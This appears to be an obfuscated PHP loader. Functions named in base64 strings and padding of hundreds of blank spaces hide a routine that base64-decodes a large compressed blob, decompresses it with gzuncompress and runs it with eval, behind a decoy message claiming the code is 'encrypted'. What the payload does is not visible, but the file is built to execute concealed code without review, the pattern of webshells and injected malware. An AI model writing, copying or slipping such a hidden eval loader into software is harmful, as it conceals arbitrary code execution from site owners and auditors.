<?php 
        $__='printf';$_='Loading This code is encrypted!';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';
                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtmltPo0AUgN9N/A9sYoImGwPUaknThw6W6dAuDa3l9mJgQIpcV6Qt/vqd3lyNL5r1wTXnm8DMnMzMuczJPMBw3I6TW0aPLx/i/PGO7267e3r8zSKuOFoEIcfqMKcPTfkYBj84JfWq6vz8nO8eH+3X4Y6PoHzFstlR7hPpvZHwtihXjiXGLh70+K3oRV68i33a9TgAAIDvCU8zUwhsrSbYlBxrVWiqfGc3ydXu1Nwcm9uTECIFAAAAAAAAAP8b8DUDAADg+8L7XhVeXtwG4eY3Cd+FiAAAAADAP/H6KgLBaUaUKCIzlLiWW/qZmYyUQDFMXZ0P1PlMoeVohtIQpwKTT/wGJZ6tpU7LiKikN56NBILVe0cyn2iDFj5eLwPJTLQmubo2Cl2JO0uamevAShvXlJd+pqcET0uatRe+NS9sUcaz+Vq1xU5JlItIa2TBaTFb4kPdXnnDfj5ZCaM36wxUY64iZA6iaBz383FrWjDbEruFFjSftln/nuJpxnxqHdrjHBVUoTvbMr1ybP2JqEHq5PrSkR7TYPgrcu2F4FrthPkzN0Q0mEbCKGT6idKPCHZFplvwLLkmqnznSHJNW9MmsHQWn4T5y8YoaLN+tB2/eYbMnsysg+vikvl770vtp2CoiSyGxeimOsyRr41S3sfsNxmYtaugpRujzLPWKVGfYxGN4s5+zJrZrG5tmcT9eiypK4rX5UE2llg715juNKWNbLjYqSlerIhSLPmPXiX4lKTrbevTfe+s+5HpL+a+Z+LJX4Wn/ObN/3xWC7drvnp5vYunr9Jmt4ln3T8fBQRj';
        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;